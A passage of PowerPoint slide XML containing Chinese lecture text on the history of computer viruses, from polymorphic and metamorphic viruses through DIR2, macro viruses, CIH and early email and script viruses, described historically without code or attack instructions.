              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1992</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年出现的多态性计算机病毒让所有的防杀病毒的措施都失去了作用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1995</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年以后，多态病毒更发展成了能改变自身代码的变形计算机病毒，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Stealth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（地震）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Ghost/One-Half/3544</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（幽灵）计算机病毒等。有的变形病毒具有数千甚至上万种变形，使得对这些病毒的查杀变得非常的困难。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>真正给防病毒阵营带来致命打击的是一个叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DIR2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的计算机病毒，它只有短短的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节的程序代码，采用了与过去文件型病毒完全不同的传播机制。成功地越过了当时被广泛使用的防病毒卡以及其他防病毒软件的防线，大面积的传播开。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DIR2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之后，病毒的发展进入了一个相当缓慢的时期，各种各样的病毒在以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>KV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系列、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>KILL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为首的众多杀毒软件的围剿下已没有过去的生机。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特别是随着微软</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows 95</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>操作系统的推出，大量的用户升级使用新的操作系统上，过去依赖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的很多病毒失去了生存的土壤。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>国外出现了各种专门讨论计算机病毒技术的地下站点，相互交流编写病毒的心得体会和经验，并传播各种专门的计算机病毒引擎。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1996</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows 95</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>操作系统获得广泛使用，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows 95</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>采用的技术也逐渐被病毒编写者掌握。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机病毒技术有了新的发展，新的变形病毒采用了二维变形甚至多维变形技术以对抗防病毒软件的查杀，这些病毒都没有能掀起太大的风浪。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>真正引起波澜的是关于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防病毒厂商制造病毒的争论</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。病毒制造者是什么人一直是人们讨论的话题，其中有一种说法是防病毒软件的厂商也在自己制造并传播病毒，通过升级杀毒软件来获取利润。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>KV300</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的江民公司为了防止盗版在软件中加入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>逻辑锁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，被公安部以违反</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机安全管理条例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>罚款</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>元</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1997</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年，微软的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系列软件成为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows 95</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>平台下的首选的办公套件，几乎每一台计算机上都安装了这个办公套件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机病毒又找到了新的突破口，一种新的类型的病毒随之诞生，这就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>宏病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。宏病毒主要感染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的文件并借助这两种文件进行传播。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常见的宏病毒如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Taiwan No.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（台湾一号）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Consept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Mdma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1998</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年，病毒发展中出现了一个有史以来最危险、最具破坏力的病毒，这就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CIH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CIH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>具有以下几个特征：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CIH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>病毒是第一个流行的攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>位保护模式程序的病毒。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CIH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>病毒是第一个能破坏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>FLASH ROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指令的病毒。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CIH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>病毒利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VXD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术逃过了当时所有的反病毒软件的监测。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CIH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>发作时破坏硬盘上的引导区，导致硬盘数据丢失。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>互联网的快速发展和广泛应用给病毒的发展带来了更广阔的舞台，互联网使病毒的传播变得更加容易、更加快速。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>互联网病毒是利用互联网技术开发、传染和破坏的所有病毒的统称。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其中最典型的就是电子邮件病毒，平常形式上就作为电子邮件的一个附件隐藏在电子邮件中。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用流行的脚本编程语言如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等编写而成的脚本病毒更成为病毒发展史上一个新的亮点。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
